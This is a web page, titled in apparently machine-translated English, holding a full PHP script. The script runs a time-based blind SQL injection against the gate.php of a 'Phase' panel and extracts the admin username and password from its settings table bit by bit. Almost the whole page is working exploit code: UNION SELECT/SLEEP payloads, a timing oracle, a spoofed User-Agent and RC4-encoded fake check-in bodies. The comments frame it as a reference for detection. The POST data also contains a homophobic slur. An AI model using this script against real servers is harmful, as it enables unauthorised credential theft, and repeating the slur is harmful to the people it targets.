Security entry villages loophole - SQL injection



      PHP Source Code

      1. <?php
      // Time-based blind SQL-injection extraction script aimed at the "Phase"
      // panel's gate.php (see is_true() below). Kept here as a defensive
      // reference: the payload shape, the constant request body/User-Agent and
      // the timing profile this tool produces are what a WAF rule, IDS
      // signature or access-log review should key on.
      2. ********// PanelHunter.zip hash: c49c74a609b24284a0a66fc008c4d8f2
      3. ********// Start with PHP CLI (php pwn.php)
      // No execution time limit: every probe below is one HTTP round trip and
      // a single character costs several of them.
      4. ********set_time_limit(0);
      5. *********
      6. ********// Adjust this :)
      // SLEEP_TIME is the MySQL SLEEP() duration spliced into each probe (kept
      // as a string because it is only ever concatenated into SQL). PAGE_TIME
      // is the elapsed-seconds threshold is_true() compares against. The two
      // are equal, so any response slower than the injected sleep is read as
      // "condition true"; there is no margin for network jitter either way.
      7. ********define('SLEEP_TIME', '4');
      8. ********define('PAGE_TIME',* 4);
      // Base URL of the panel; 'gate.php?i=...' is appended in is_true().
      9. ********define('URL',******* 'http://localhost/Phase/');
      10. *********
      11. ********echo('attacking ' . URL . PHP_EOL);
      12. *********
      // Recovers the `settings` rows keyed 'username' and 'password' one bit at
      // a time (get_char()). Detection: a burst of POSTs to gate.php whose `i`
      // query parameter carries UNION SELECT / SLEEP( and whose latencies
      // alternate between roughly 0 s and roughly SLEEP_TIME s from one source.
      13. ********get_string('username');
      14. ********get_string('password');
      15. *********
      16. ********function get_length($field) {
      // Returns LENGTH(value) for the `settings` row whose `key` is $field.
      // Linear probe: guesses 1, 2, 3, ... with one HTTP request each until the
      // timing oracle fires. The predicate is arranged so SLEEP() only runs
      // when the guess is exact: NOT (LENGTH(value)=N) is false only then, and
      // only then does the OR branch evaluate.
      // There is no upper bound and no existence check: if no row matches
      // $field, SLEEP() never executes and this loop would never terminate.
      17. ****************$length = 1;
      18. *****************
      19. ****************while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
      20. ************************++$length;
      21. ****************}
      22. *****************
      23. ****************echo($field . ' length: ' . $length . PHP_EOL);
      24. *****************
      25. ****************return $length;
      26. ********}
      27. *********
      28. ********function get_string($field) {
      // Reassembles the `settings` value for $field: first its length via
      // get_length(), then one character per position via get_char().
      // Progress is echoed after every character, with '*' padding for the
      // positions not yet recovered. Returns the recovered string.
      29. ****************$length = get_length($field);
      30. ****************$str*** = '';
      31. *****************
      32. ****************for ($i = 0; $i < $length; ++$i) {
      33. ************************$str .= chr(get_char($field, $i));
      34. ************************echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
      35. ****************}
      36. *****************
      37. ****************return $str;
      38. ********}
      39. *********
      40. ********function get_char($field, $id) {
      // Recovers the byte at 0-based position $id of the `settings` value for
      // $field, one bit per request: for each bit weight 1, 2, 4, ..., 64 the
      // probe tests ORD(SUBSTR(value, id+1, 1)) & weight and reads the answer
      // off the response delay (same NOT(...) OR SLEEP() construction as in
      // get_length()). Bit 128 is never queried and is hard-wired to '0', i.e.
      // values are assumed to be 7-bit ASCII; that makes 7 requests per
      // character. Each bit is prepended, so $binary ends up MSB-first for
      // bindec().
      41. ****************$binary = '';
      42. *****************
      43. ****************for ($i = 1; $i < 256; $i *= 2) {
      44. ************************if ($i == 128)
      45. ********************************$binary = '0' . $binary;
      46. ************************else
      47. ********************************$binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
      48. ****************}
      49. *****************
      50. ****************return bindec($binary);
      51. ********}
      52. *********
      53. ********function is_true($query) {
      // The timing oracle. Issues one POST to gate.php with the SQL fragment
      // URL-encoded and appended to the `i` query parameter, after a
      // plausible-looking IP, and reports whether the round trip took at least
      // PAGE_TIME seconds.
      // The POST body imitates a bot check-in: constant u/d/b fields are
      // RC4-encrypted under the 4-byte key 'aaaa' and that key is sent in clear
      // as the body's prefix. The body is therefore a fixed byte string on
      // every request — a usable network fingerprint for this tool, alongside
      // the constant User-Agent set in post_request().
      // NOTE(review): the default 127.0.0.1 suggests `i` is meant to be an IP
      // address; this script relies on it being interpolated unescaped into the
      // query on the `settings` table. The server-side fix — binding `i` as a
      // parameter and/or validating it as an IP before use — lives in gate.php,
      // not here.
      // No error handling: curl_exec() failures are not inspected, so a
      // transport error or a CURLOPT_TIMEOUT (30 s) expiry is timed like any
      // slow response and reads as "true".
      54. ****************$rc4_key** = 'aaaa'; // b d u
      55. ****************$data***** = 'u=tapz&d=faggot&b=lol';
      56. ****************$encode*** = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
      57. ****************$encode*** = $rc4_key . $encode;
      58. ****************$injection = urlencode($query);
      59. ****************$req****** = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
      60. *****************
      // Equivalent to $req['time'] >= PAGE_TIME.
      61. ****************return !($req['time'] < PAGE_TIME);
      62. ********}
      63. *********
      64. ********function post_request($url, $data) {
      // Thin cURL wrapper: a single POST of $data to $url, wall-clock timed
      // around curl_exec(), with headers stripped from the returned body.
      // Returns ['page' => response body (or false), 'time' => elapsed seconds].
      // curl_exec()'s false return is never checked, so callers cannot tell a
      // failed request from an empty page; the timing is still returned. The
      // hard-coded desktop Chrome User-Agent is identical on every request and
      // is a stable detection signature for this tool.
      65. ********$handle = curl_init($url);
      66. *********
      67. ********curl_setopt($handle, CURLOPT_HEADER,******** false);
      68. ********curl_setopt($handle, CURLOPT_USERAGENT,***** 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
      69. ********curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
      70. ********curl_setopt($handle, CURLOPT_POST,********** true);
      71. ********curl_setopt($handle, CURLOPT_POSTFIELDS,**** $data);
      // 30 s ceiling per request; a hit here is reported as a slow response.
      72. ****************curl_setopt($handle, CURLOPT_TIMEOUT,******* 30);
      73. *********
      74. ****************$time = microtime(true);
      75. ********$page = curl_exec($handle);
      76. ********$time = microtime(true) - $time;
      77. *****************
      78. ********curl_close($handle);
      79. *****************
      80. ********return array(
      81. ************************'page' => $page,
      82. ************************'time' => $time
      83. ****************);
      84. ****}
      85. *********
      86. ********function rc4($pwd, $data, $data_length, $pwd_length){
      // Textbook RC4: key schedule over $pwd, then XOR of $data with the
      // keystream. $data_length and $pwd_length are passed explicitly rather
      // than derived from the strings. Used by is_true() to wrap the POST body;
      // presumably this mirrors how the panel's own clients encode check-ins —
      // TODO confirm against the gate.php source, which is not on this page.
      // RC4 offers no real confidentiality here: the key is 4 bytes and the
      // caller transmits it in clear immediately before the ciphertext.
      // The two `$x[] = ''` lines only seed index 0 with '', which the first
      // loop overwrites; they are harmless noise.
      87. ****************$key[] = '';
      88. ****************$box[] = '';
      89. ****************$cipher = '';
      90. *
      // Key-scheduling: repeat the key to 256 bytes, identity-initialise the box.
      91. ****************for ($i = 0; $i < 256; $i++)
      92. ****************{
      93. ************************$key[$i] = ord($pwd[$i % $pwd_length]);
      94. ************************$box[$i] = $i;
      95. ****************}
      // Key-scheduling: permute the box under the key.
      96. ****************for ($j = $i = 0; $i < 256; $i++)
      97. ****************{
      98. ************************$j = ($j + $box[$i] + $key[$i]) % 256;
      99. ************************$tmp = $box[$i];
      100. ************************$box[$i] = $box[$j];
      101. ************************$box[$j] = $tmp;
      102. ****************}
      // Keystream generation and XOR, one output byte per input byte.
      103. ****************for ($a = $j = $i = 0; $i < $data_length; $i++)
      104. ****************{
      105. ************************$a = ($a + 1) % 256;
      106. ************************$j = ($j + $box[$a]) % 256;
      107. ************************$tmp = $box[$a];
      108. ************************$box[$a] = $box[$j];
      109. ************************$box[$j] = $tmp;
      110. ************************$k = $box[(($box[$a] + $box[$j]) % 256)];
      111. ************************$cipher .= chr(ord($data[$i]) ^ $k);
      112. ****************}
      113. ****************return $cipher;
      114. ********}
      115. *